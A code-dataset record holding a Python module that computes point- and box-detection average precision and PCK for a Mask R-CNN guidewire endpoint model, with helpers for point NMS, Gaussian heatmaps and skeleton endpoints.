hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
91241904e244238fe54d661ecdc0d33ab3a1e23c
| 28,064
|
py
|
Python
|
samples/guidewire/compute_ap.py
|
liruiqi0515/mask-rcnn-point
|
8a4da7067b7eb0c638199a7af988a7573a9fffbc
|
[
"MIT"
] | null | null | null |
samples/guidewire/compute_ap.py
|
liruiqi0515/mask-rcnn-point
|
8a4da7067b7eb0c638199a7af988a7573a9fffbc
|
[
"MIT"
] | null | null | null |
samples/guidewire/compute_ap.py
|
liruiqi0515/mask-rcnn-point
|
8a4da7067b7eb0c638199a7af988a7573a9fffbc
|
[
"MIT"
] | null | null | null |
import keras.backend as K
import cv2, time, os
import numpy as np
import model as modellib
from skimage import morphology
class MAPCallback:
    """Evaluation callback: point-detection mAP over a validation set.

    Runs `model.detect` on `inference_num` validation images, converts the
    argmax of each predicted mask channel into a point detection, and scores
    the detections against ground-truth points with a VOC-style average
    precision at several pixel-distance thresholds.

    Assumes each predicted mask has at least two channels, one per endpoint
    class (channels 0 and 1 are indexed below) -- TODO confirm against the
    model's actual output shape.
    """

    def __init__(self,
                 model,
                 val_dataset,
                 class_names,
                 threshold=5,
                 inference_num=50,
                 batch_size=1,
                 old_version=False):
        # model:         detector exposing detect([image]) -> dict with
        #                'rois', 'scores', 'masks'
        # val_dataset:   dataset consumed by modellib.load_image_gt_eval
        # class_names:   one name per point class; its length fixes num_classes
        # threshold:     stored pixel-distance threshold (compute_aps takes its
        #                own threshold argument; this attribute is kept for API
        #                compatibility)
        # inference_num: number of validation images to evaluate
        # old_version:   if True, rank detections by box score alone instead of
        #                score * heatmap peak value
        super(MAPCallback, self).__init__()
        self.model = model
        self.inference_num = inference_num
        self.class_names = class_names
        self.num_classes = len(class_names)
        self.val_dataset = val_dataset
        self.threshold = threshold
        self.batch_size = batch_size
        self.old_version = old_version

    def _voc_ap(self, rec, prec):
        """Area under the precision/recall curve (VOC-style integration)."""
        # correct AP calculation
        # first append sentinel values at the end
        mrec = np.concatenate(([0.], rec, [1.]))
        mpre = np.concatenate(([0.], prec, [0.]))
        # compute the precision envelope
        for i in range(mpre.size - 1, 0, -1):
            mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
        # to calculate area under PR curve, look for points
        # where X axis (recall) changes value
        i = np.where(mrec[1:] != mrec[:-1])[0]
        # and sum (\Delta recall) * prec
        ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
        return ap

    def calculate_result(self):
        """Run inference over the validation set and collect detections.

        Returns:
            true_res: dict image_id -> ground-truth points
                      [num_guidewire, num_point, 2]
            pred_res: list of [image_id, point_class, score, x, y]
        """
        true_res = {}
        pred_res = []
        inference_time = 0
        for i in range(self.inference_num):
            image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
            start = time.time()
            results = self.model.detect([image])[0]
            end = time.time()
            inference_time = inference_time + (end - start)
            out_boxes = results['rois']
            out_scores = results['scores']
            out_masks = results['masks']
            pred_res_0 = []
            pred_res_1 = []
            if len(out_boxes) > 0:
                for out_box, out_score, out_mask in zip(
                        out_boxes, out_scores, out_masks):
                    # Peak of heatmap channel 0 -> endpoint class 0.
                    # unravel_index yields (row, col); stored as x=col+1,
                    # y=row+1 (1-based, presumably matching the GT
                    # convention -- TODO confirm).
                    det_point = np.unravel_index(out_mask[:, :, 0].argmax(), out_mask[:, :, 0].shape)
                    if self.old_version:
                        pred_res_0.append([i, 0, out_score, det_point[1] + 1, det_point[0] + 1])
                    else:
                        # Rank by detection score weighted by heatmap peak.
                        pred_res_0.append([i, 0, out_score * out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
                    # print([i, 0, out_mask[:, :, 0].max(), det_point[1] + 1, det_point[0] + 1])
                    # Peak of heatmap channel 1 -> endpoint class 1.
                    det_point = np.unravel_index(out_mask[:, :, 1].argmax(), out_mask[:, :, 1].shape)
                    if self.old_version:
                        pred_res_1.append([i, 1, out_score, det_point[1] + 1, det_point[0] + 1])
                    else:
                        pred_res_1.append([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
                    # print([i, 1, out_score * out_mask[:, :, 1].max(), det_point[1] + 1, det_point[0] + 1])
            # Merge near-duplicate detections (within 10 px) per class.
            pred_res_0 = nms_point(pred_res_0, 10)
            pred_res_1 = nms_point(pred_res_1, 10)
            pred_res.extend(pred_res_0)
            pred_res.extend(pred_res_1)
            true_res[i] = point  # [num_guidewire, num_point, 2]
            # print(point)
        print('avg_infer_time:' + str(inference_time / self.inference_num))
        return true_res, pred_res

    def compute_aps(self, true_res, pred_res, threshold):
        """Average precision per point class at a pixel-distance threshold.

        A detection is a true positive when its squared distance to the
        nearest ground-truth point of the same class is below threshold**2.
        NOTE(review): ground-truth points are never marked as "used", so
        several detections may match the same GT point -- this is looser
        than strict VOC matching; confirm it is intended.
        """
        APs = {}
        for cls in range(self.num_classes):
            pred_res_cls = [x for x in pred_res if x[1] == cls]
            if len(pred_res_cls) == 0:
                APs[cls] = 0
                continue
            true_res_cls = {}
            npos = 0
            for index in true_res:  # index is the image_id
                guidewires = true_res[index]  # [num_guidewire, num_point, 2]
                npos += len(guidewires)  # compute recall
                point_pos = np.array([x[cls] for x in guidewires])  # [num_guidewire, 2]
                true_res_cls[index] = {
                    'point_pos': point_pos,
                }
            ids = [x[0] for x in pred_res_cls]
            scores = np.array([x[2] for x in pred_res_cls])
            points = np.array([x[3:] for x in pred_res_cls])
            # Process detections in descending score order.
            sorted_ind = np.argsort(-scores)
            points = points[sorted_ind, :]  # sorted
            ids = [ids[x] for x in sorted_ind]  # sorted
            nd = len(ids)
            tp = np.zeros(nd)
            fp = np.zeros(nd)
            for j in range(nd):
                ture_point = true_res_cls[ids[j]]
                point1 = points[j, :]  # [2]
                dis_min = np.inf
                PGT = ture_point['point_pos']  # [num_guidewire, 2]
                if len(PGT) > 0:
                    dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
                    dis_min = np.min(dis_square)
                if dis_min < threshold * threshold:
                    tp[j] = 1.
                else:
                    fp[j] = 1.
            fp = np.cumsum(fp)
            tp = np.cumsum(tp)
            # Machine epsilon guards against division by zero.
            rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
            prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
            ap = self._voc_ap(rec, prec)
            APs[cls] = ap
        return APs

    def on_epoch_end(self, logs=None):
        """Evaluate and report mAP at pixel thresholds 3, 5, 7 and 9.

        The last threshold's mAP overwrites logs['mAP'].
        """
        logs = logs or {}
        K.set_learning_phase(0)
        true_res, pred_res = self.calculate_result()
        for th in [3, 5, 7, 9]:
            APs = self.compute_aps(true_res, pred_res, th)
            for cls in range(self.num_classes):
                if cls in APs:
                    print(self.class_names[cls] + ' ap: ', APs[cls])
            mAP = np.mean([APs[cls] for cls in APs])
            print('mAP: ', mAP)
            logs['mAP'] = mAP
def nms_point(point_list, thresh):
    """Greedy non-maximum suppression on point detections.

    Args:
        point_list: list of [image_id, point_id, score, x, y] entries,
            assumed already ordered by preference (the first entry always
            survives; later entries are tested against earlier survivors).
        thresh: suppression radius in pixels; a candidate strictly closer
            than `thresh` (Euclidean) to an already-kept point is dropped.

    Returns:
        The surviving entries, in their original order.

    Improvement over the previous version: the input list is no longer
    destructively emptied (callers rebind the return value anyway), and the
    quadratic `del` shuffling is gone.  An element is kept iff it is not
    within `thresh` of any earlier kept element -- identical results.
    """
    keep = []
    thresh_sq = thresh * thresh
    for cand in point_list:
        suppressed = any(
            (cand[3] - kept[3]) ** 2 + (cand[4] - kept[4]) ** 2 < thresh_sq
            for kept in keep
        )
        if not suppressed:
            keep.append(cand)
    return keep
class MAPCallbackSame(MAPCallback):
    """mAP evaluator for models whose single heatmap channel contains both
    endpoints of a guidewire.

    Both endpoints are read from mask channel 0: the global peak is taken
    first, a Gaussian bump centred on it is subtracted to suppress it, and
    the remaining peak (if above threshold) becomes the second point.  Both
    detections are recorded under point class 0, and the ground truth is
    flattened accordingly in compute_aps.
    """

    def __init__(self,
                 model,
                 val_dataset,
                 class_names,
                 threshold=5,
                 inference_num=50,
                 batch_size=1):
        """Store evaluation configuration (see MAPCallback for parameters).

        Bug fix: MAPCallback.__init__ takes required positional arguments,
        so the previous bare super().__init__() raised TypeError as soon as
        this class was instantiated.  Forward the arguments instead; the
        base initializer performs the attribute assignments that used to be
        duplicated here (it also sets old_version=False, unused here).
        """
        super(MAPCallbackSame, self).__init__(model,
                                              val_dataset,
                                              class_names,
                                              threshold=threshold,
                                              inference_num=inference_num,
                                              batch_size=batch_size)

    def compute_point(self, pred, thresh, sigma):
        """Extract up to two peaks from a single heatmap channel.

        Args:
            pred: 2-D heatmap (assumed float responses -- TODO confirm range).
            thresh: minimum peak value for a point to count as detected.
            sigma: width of the Gaussian used to suppress the first peak.

        Returns:
            (2, 2) int32 array of (row, col) pairs; undetected points stay
            at (-1, -1).
        """
        point = -1 * np.ones((2, 2), np.int32)
        idx = np.unravel_index(pred.argmax(), pred.shape)
        # print(pred.shape)
        if pred[idx[0], idx[1]] > thresh:
            point[0] = [idx[0], idx[1]]
            # Suppress the first peak with a Gaussian bump scaled to its
            # height, then look for the second-highest response.
            minus = makeGaussian(pred.shape[0], pred.shape[1], sigma, (idx[1], idx[0])) * pred[idx[0], idx[1]]
            pred = pred - minus
            idx_1 = np.unravel_index(pred.argmax(), pred.shape)
            if pred[idx_1[0], idx_1[1]] > thresh:
                point[1] = [idx_1[0], idx_1[1]]
        return point

    def calculate_result(self):
        """Run inference; both endpoints are reported as point class 0.

        Returns:
            true_res: dict image_id -> GT points [num_guidewire, num_point, 2]
            pred_res: list of [image_id, 0, score, x, y]
        """
        true_res = {}
        pred_res = []
        inference_time = 0
        for i in range(self.inference_num):
            image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
            start = time.time()
            results = self.model.detect([image])[0]
            end = time.time()
            inference_time = inference_time + (end - start)
            out_boxes = results['rois']
            out_scores = results['scores']
            out_masks = results['masks']
            if len(out_boxes) > 0:
                for out_box, out_score, out_mask in zip(
                        out_boxes, out_scores, out_masks):
                    det_point = self.compute_point(out_mask[:, :, 0], 0.1, 6)
                    # NOTE(review): appended even when compute_point left a
                    # point at (-1, -1), i.e. coordinates (0, 0) after the
                    # +1 shift -- confirm downstream scoring tolerates this.
                    pred_res.append([i, 0, out_score, det_point[0][1] + 1, det_point[0][0] + 1])
                    pred_res.append([i, 0, out_score, det_point[1][1] + 1, det_point[1][0] + 1])
                    # print([i, 0, out_score, det_point[0][1], det_point[0][0]])
                    # print([i, 0, out_score, det_point[1][1], det_point[1][0]])
            true_res[i] = point  # [num_guidewire, num_point, 2]
        print('avg_infer_time:' + str(inference_time / self.inference_num))
        return true_res, pred_res

    def compute_aps(self, true_res, pred_res, threshold):
        """AP per class after flattening the GT so every endpoint becomes
        its own single-point "guidewire" (both endpoints are predicted as
        class 0).

        NOTE(review): after the reshape each GT entry has shape [1, 2], so
        x[cls] only works for cls == 0; more than one class name would
        raise IndexError here -- confirm class_names always has length 1.
        """
        APs = {}
        for cls in range(self.num_classes):
            pred_res_cls = [x for x in pred_res if x[1] == cls]
            if len(pred_res_cls) == 0:
                APs[cls] = 0
                continue
            true_res_cls = {}
            npos = 0
            for index in true_res:  # index is the image_id
                guidewires = true_res[index]  # [num_guidewire, num_point, 2]
                # Flatten: every endpoint counts as a separate GT instance.
                guidewires = np.reshape(guidewires, [guidewires.shape[0] * guidewires.shape[1], 1, 2])
                npos += len(guidewires)  # compute recall
                point_pos = np.array([x[cls] for x in guidewires])  # [num_guidewire, 2]
                true_res_cls[index] = {
                    'point_pos': point_pos,
                }
            ids = [x[0] for x in pred_res_cls]
            scores = np.array([x[2] for x in pred_res_cls])
            points = np.array([x[3:] for x in pred_res_cls])
            # Process detections in descending score order.
            sorted_ind = np.argsort(-scores)
            points = points[sorted_ind, :]  # sorted
            ids = [ids[x] for x in sorted_ind]  # sorted
            nd = len(ids)
            tp = np.zeros(nd)
            fp = np.zeros(nd)
            for j in range(nd):
                ture_point = true_res_cls[ids[j]]
                point1 = points[j, :]  # [2]
                dis_min = np.inf
                PGT = ture_point['point_pos']  # [num_guidewire, 2]
                if len(PGT) > 0:
                    dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
                    dis_min = np.min(dis_square)
                if dis_min < threshold * threshold:
                    tp[j] = 1.
                else:
                    fp[j] = 1.
            fp = np.cumsum(fp)
            tp = np.cumsum(tp)
            # Machine epsilon guards against division by zero.
            rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
            prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
            ap = self._voc_ap(rec, prec)
            APs[cls] = ap
        return APs
def makeGaussian(height, width, sigma=3, center=None):
    """Build a (height, width) 2-D Gaussian kernel, one piece of heatmap
    generation.

    The peak value is 1.0 at `center` (given as (x, y), i.e. (col, row));
    when center is None the kernel is centred on the image.  The falloff is
    exp(-4*ln2 * r^2 / sigma^2), so `sigma` acts as a full-width parameter.
    """
    cols = np.arange(0, width, 1, float)
    rows = np.arange(0, height, 1, float)[:, np.newaxis]
    if center is None:
        center_x = width // 2
        center_y = height // 2
    else:
        center_x, center_y = center[0], center[1]
    dist_sq = (cols - center_x) ** 2 + (rows - center_y) ** 2
    return np.exp(-4 * np.log(2) * dist_sq / (sigma ** 2))
class MAPCallbackMask(MAPCallbackSame):
    """mAP evaluator that reads endpoints off the skeleton of the predicted
    mask instead of heatmap peaks.
    """

    def __init__(self,
                 model,
                 val_dataset,
                 class_names,
                 threshold=0.1,
                 inference_num=50,
                 batch_size=1):
        # threshold here is the mask binarisation threshold passed to
        # compute_point_from_mask, not a pixel distance.
        # super(MAPCallbackMask, self).__init__()
        self.model = model
        self.inference_num = inference_num
        self.class_names = class_names
        self.num_classes = len(class_names)
        self.val_dataset = val_dataset
        self.threshold = threshold
        self.batch_size = batch_size

    def compute_point_from_mask(self, pred, thresh):
        """Return up to two skeleton endpoints of the binarised mask.

        The mask is thresholded, skeletonised, then convolved with
        [[1,1,1],[1,8,1],[1,1,1]]: a response of exactly 9 means a skeleton
        pixel (8) with exactly one skeleton neighbour (1), i.e. an endpoint.
        """
        pred = (pred > thresh).astype('uint8')
        skeleton = morphology.skeletonize(pred)
        fil = np.array([[1, 1, 1], [1, 8, 1], [1, 1, 1]])
        conv = cv2.filter2D(np.float32(skeleton), -1, fil)
        result = conv == 9
        x, y = np.where(result == True)
        endpoint = []
        # Keep at most the first two endpoints found (row-major order).
        num_point = min(len(x), 2)
        for i in range(num_point):
            endpoint.append(np.array([x[i], y[i]]))
        return endpoint

    def calculate_result(self):
        """Run inference; skeleton endpoints are reported as point class 0.

        Returns:
            true_res: dict image_id -> GT points [num_guidewire, num_point, 2]
            pred_res: list of [image_id, 0, score, x, y]
        """
        true_res = {}
        pred_res = []
        inference_time = 0
        for i in range(self.inference_num):
            image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
            start = time.time()
            results = self.model.detect([image])[0]
            end = time.time()
            inference_time = inference_time + (end - start)
            out_boxes = results['rois']
            out_scores = results['scores']
            out_masks = results['masks']
            if len(out_boxes) > 0:
                for out_box, out_score, out_mask in zip(
                        out_boxes, out_scores, out_masks):
                    det_point = self.compute_point_from_mask(out_mask[:, :, 0], self.threshold)
                    # det_point entries are (row, col); stored as 1-based
                    # x=col+1, y=row+1.
                    for det_point_i in det_point:
                        pred_res.append([i, 0, out_score, det_point_i[1] + 1, det_point_i[0] + 1])
                    # print([i, 0, out_score, det_point[0][1], det_point[0][0]])
                    # print([i, 0, out_score, det_point[1][1], det_point[1][0]])
            true_res[i] = point  # [num_guidewire, num_point, 2]
            # print(point)
        print('avg_infer_time:' + str(inference_time / self.inference_num))
        return true_res, pred_res

    def compute_aps(self, true_res, pred_res, threshold):
        """AP per class after flattening GT endpoints into single-point
        instances.

        NOTE(review): this body appears identical to
        MAPCallbackSame.compute_aps and could simply be inherited.
        """
        APs = {}
        for cls in range(self.num_classes):
            pred_res_cls = [x for x in pred_res if x[1] == cls]
            if len(pred_res_cls) == 0:
                APs[cls] = 0
                continue
            true_res_cls = {}
            npos = 0
            for index in true_res:  # index is the image_id
                guidewires = true_res[index]  # [num_guidewire, num_point, 2]
                # Flatten: every endpoint counts as a separate GT instance.
                guidewires = np.reshape(guidewires, [guidewires.shape[0] * guidewires.shape[1], 1, 2])
                npos += len(guidewires)  # compute recall
                point_pos = np.array([x[cls] for x in guidewires])  # [num_guidewire, 2]
                true_res_cls[index] = {
                    'point_pos': point_pos,
                }
            ids = [x[0] for x in pred_res_cls]
            scores = np.array([x[2] for x in pred_res_cls])
            points = np.array([x[3:] for x in pred_res_cls])
            # Process detections in descending score order.
            sorted_ind = np.argsort(-scores)
            points = points[sorted_ind, :]  # sorted
            ids = [ids[x] for x in sorted_ind]  # sorted
            nd = len(ids)
            tp = np.zeros(nd)
            fp = np.zeros(nd)
            for j in range(nd):
                ture_point = true_res_cls[ids[j]]
                point1 = points[j, :]  # [2]
                dis_min = np.inf
                PGT = ture_point['point_pos']  # [num_guidewire, 2]
                if len(PGT) > 0:
                    dis_square = np.square(PGT[:, 0] - point1[0]) + np.square(PGT[:, 1] - point1[1])
                    dis_min = np.min(dis_square)
                if dis_min < threshold * threshold:
                    tp[j] = 1.
                else:
                    fp[j] = 1.
            fp = np.cumsum(fp)
            tp = np.cumsum(tp)
            # Machine epsilon guards against division by zero.
            rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
            prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
            ap = self._voc_ap(rec, prec)
            APs[cls] = ap
        return APs
def makeGaussian(height, width, sigma=3, center=None):
    """Build a (height, width) 2-D Gaussian kernel for heatmap generation.

    NOTE(review): this re-definition is byte-for-byte equivalent to the
    makeGaussian defined earlier in this module and simply rebinds the name.

    `center` is (x, y) = (col, row); defaults to the image centre.  Peak
    value is 1.0 with falloff exp(-4*ln2 * r^2 / sigma^2).
    """
    if center is None:
        x0 = width // 2
        y0 = height // 2
    else:
        x0, y0 = center[0], center[1]
    xs = np.arange(0, width, 1, float)
    ys = np.arange(0, height, 1, float)[:, np.newaxis]
    exponent = ((xs - x0) ** 2 + (ys - y0) ** 2) / (sigma ** 2)
    return np.exp(-4 * np.log(2) * exponent)
class MAPCallbackBox:
    """Evaluation callback: box-detection mAP at IoU > 0.5 on validation data."""

    def __init__(self,
                 model,
                 val_dataset,
                 class_names,
                 inference_num=50,
                 batch_size=1):
        # model:       detector exposing detect([image]) -> dict with
        #              'rois' and 'scores'
        # val_dataset: dataset consumed by modellib.load_image_gt_eval
        super(MAPCallbackBox, self).__init__()
        self.model = model
        self.inference_num = inference_num
        self.class_names = class_names
        self.num_classes = len(class_names)
        self.val_dataset = val_dataset
        self.batch_size = batch_size

    def _voc_ap(self, rec, prec):
        """Area under the precision/recall curve (VOC-style integration)."""
        # correct AP calculation
        # first append sentinel values at the end
        mrec = np.concatenate(([0.], rec, [1.]))
        mpre = np.concatenate(([0.], prec, [0.]))
        # compute the precision envelope
        for i in range(mpre.size - 1, 0, -1):
            mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
        # to calculate area under PR curve, look for points
        # where X axis (recall) changes value
        i = np.where(mrec[1:] != mrec[:-1])[0]
        # and sum (\Delta recall) * prec
        ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
        return ap

    def calculate_result(self):
        """Collect predicted boxes and ground-truth boxes.

        Returns:
            true_res: dict image_id -> GT boxes [num_guidewire, 4]
            pred_res: list of [image_id, class_id(=0), score, box]
        """
        true_res = {}
        pred_res = []
        inference_time = 0
        for i in range(self.inference_num):
            image, class_ids, bbox, point = modellib.load_image_gt_eval(self.val_dataset, i)
            start = time.time()
            results = self.model.detect([image])[0]
            end = time.time()
            inference_time = inference_time + (end - start)
            out_boxes = results['rois']
            out_scores = results['scores']
            if len(out_boxes) > 0:
                for out_box, out_score in zip(
                        out_boxes, out_scores):
                    pred_res.append([i, 0, out_score, out_box])
                    # print([i, 0, out_score, out_box])
            true_res[i] = bbox  # [num_guidewire, 4]
            # print(bbox)
        print('avg_infer_time:' + str(inference_time / self.inference_num))
        return true_res, pred_res

    def compute_iou(self, box, boxes, box_area, boxes_area):
        """IoU between one box and an array of boxes.

        Boxes are (y1, x1, y2, x2) per the indexing below; areas are passed
        in precomputed.
        """
        # Calculate intersection areas
        y1 = np.maximum(box[0], boxes[:, 0])
        y2 = np.minimum(box[2], boxes[:, 2])
        x1 = np.maximum(box[1], boxes[:, 1])
        x2 = np.minimum(box[3], boxes[:, 3])
        intersection = np.maximum(x2 - x1, 0) * np.maximum(y2 - y1, 0)
        union = box_area + boxes_area[:] - intersection[:]
        iou = intersection / union
        return iou

    def compute_aps(self, true_res, pred_res):
        """AP per class; a detection is a TP when its best IoU against the
        image's GT boxes exceeds 0.5.

        NOTE(review): if an image has no GT boxes the detection counts as
        neither TP nor FP, and GT boxes are never marked matched, so
        duplicate detections of one GT can all count as TPs -- confirm this
        looser-than-VOC matching is intended.
        """
        APs = {}
        for cls in range(self.num_classes):
            pred_res_cls = [x for x in pred_res if x[1] == cls]
            if len(pred_res_cls) == 0:
                APs[cls] = 0
                continue
            true_res_cls = {}
            npos = 0
            for index in true_res:  # index is the image_id
                guidewires = true_res[index]  # [num_guidewire, 4]
                npos += len(guidewires)  # compute recall
                point_pos = np.array([x for x in guidewires])  # [num_guidewire, 4]
                true_res_cls[index] = {
                    'point_pos': point_pos,
                }
            ids = [x[0] for x in pred_res_cls]
            scores = np.array([x[2] for x in pred_res_cls])
            points = np.array([x[3] for x in pred_res_cls])
            # Process detections in descending score order.
            sorted_ind = np.argsort(-scores)
            points = points[sorted_ind, :]  # sorted
            ids = [ids[x] for x in sorted_ind]  # sorted
            nd = len(ids)
            tp = np.zeros(nd)
            fp = np.zeros(nd)
            for j in range(nd):
                ture_point = true_res_cls[ids[j]]
                box = points[j, :]  # [4]
                PGT = ture_point['point_pos']  # [num_guidewire, 4]
                box_area = (box[2] - box[0]) * (box[3] - box[1])
                boxes_area = (PGT[:, 2] - PGT[:, 0]) * (PGT[:, 3] - PGT[:, 1])
                if len(PGT) > 0:
                    IOU = self.compute_iou(box, PGT, box_area, boxes_area)
                    iou_max = np.max(IOU)
                    if iou_max > 0.5:
                        tp[j] = 1.
                    else:
                        fp[j] = 1.
            fp = np.cumsum(fp)
            tp = np.cumsum(tp)
            # Machine epsilon guards against division by zero.
            rec = tp / np.maximum(float(npos), np.finfo(np.float64).eps)
            prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)
            ap = self._voc_ap(rec, prec)
            APs[cls] = ap
        return APs

    def on_epoch_end(self, logs=None):
        """Compute and report box mAP; stores the value in logs['mAP']."""
        logs = logs or {}
        K.set_learning_phase(0)  # For BN
        true_res, pred_res = self.calculate_result()
        APs = self.compute_aps(true_res, pred_res)
        for cls in range(self.num_classes):
            if cls in APs:
                print(self.class_names[cls] + ' ap: ', APs[cls])
        mAP = np.mean([APs[cls] for cls in APs])
        print('mAP: ', mAP)
        logs['mAP'] = mAP
class MAPCallbackPCK:
    """Evaluation callback: PCK (percentage of correct keypoints) for point
    localization given ground-truth boxes.
    """

    def __init__(self,
                 model,
                 val_dataset,
                 class_names,
                 inference_num=50,
                 batch_size=1):
        # model:       exposes localization([image], [bbox]) -> masks
        # val_dataset: dataset consumed by modellib.load_image_gt_eval
        super(MAPCallbackPCK, self).__init__()
        self.model = model
        self.inference_num = inference_num
        self.class_names = class_names
        self.num_classes = len(class_names)
        self.val_dataset = val_dataset
        self.batch_size = batch_size

    def _voc_ap(self, rec, prec):
        """Area under the precision/recall curve (VOC-style integration).

        NOTE(review): not referenced by the PCK computation below.
        """
        # correct AP calculation
        # first append sentinel values at the end
        mrec = np.concatenate(([0.], rec, [1.]))
        mpre = np.concatenate(([0.], prec, [0.]))
        # compute the precision envelope
        for i in range(mpre.size - 1, 0, -1):
            mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
        # to calculate area under PR curve, look for points
        # where X axis (recall) changes value
        i = np.where(mrec[1:] != mrec[:-1])[0]
        # and sum (\Delta recall) * prec
        ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
        return ap

    def check_dt(self, box, gtbox):
        """True iff `box` overlaps some GT box with IoU > 0.5.

        NOTE(review): not called anywhere in this file's visible code.
        """
        box_area = (box[2] - box[0]) * (box[3] - box[1])
        boxes_area = (gtbox[:, 2] - gtbox[:, 0]) * (gtbox[:, 3] - gtbox[:, 1])
        IOU = self.compute_iou(box, gtbox, box_area, boxes_area)
        iou_max = np.max(IOU)
